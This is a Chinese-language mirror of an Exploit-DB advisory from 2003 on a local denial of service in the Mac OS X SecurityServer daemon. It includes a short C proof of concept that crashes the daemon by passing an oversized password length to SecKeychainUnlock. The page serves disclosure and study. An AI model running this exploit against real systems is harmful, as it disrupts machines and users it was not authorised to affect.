Apple Mac OSX 10.x – SecurityServer Daemon Local Denial of Service

Apple Mac OSX 10.x – SecurityServer Daemon Local Denial of Service

漏洞ID 1054344 漏洞类型
发布时间 2003-12-30 更新时间 2003-12-30
图片[1]-Apple Mac OSX 10.x – SecurityServer Daemon Local Denial of Service-安全小百科CVE编号 N/A
图片[2]-Apple Mac OSX 10.x – SecurityServer Daemon Local Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 OSX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23505
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9332/info

Apple MacOS X SecurityServer has been reported prone to a denial of service vulnerability that may be triggered by a local user. The issue may be triggered under certain circumstances when a large password for a SecKeychainUnlock() call is specified under certain circumstances.

It has been reported that this activity will cause the SecurityServer to crash. The server appears to crash during a memory copy operation, potentially resulting in memory corruption. This could possibly allow for execution of arbitrary code, though this possibility has not been confirmed. 

#include <Security/Security.h>
int main(int argc, const char *argv[])
{
    SecKeychainRef defaultKeychain;
    SecKeychainCopyDefault(&defaultKeychain);
    SecKeychainLock(defaultKeychain);
    SecKeychainUnlock(defaultKeychain, 0xFFFFFFFF, "password", true);
    return 0;
}

相关推荐: AOL Instant Messenger Link Special Character Remote Heap Overflow Vulnerability

AOL Instant Messenger Link Special Character Remote Heap Overflow Vulnerability 漏洞ID 1101648 漏洞类型 Boundary Condition Error 发布时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享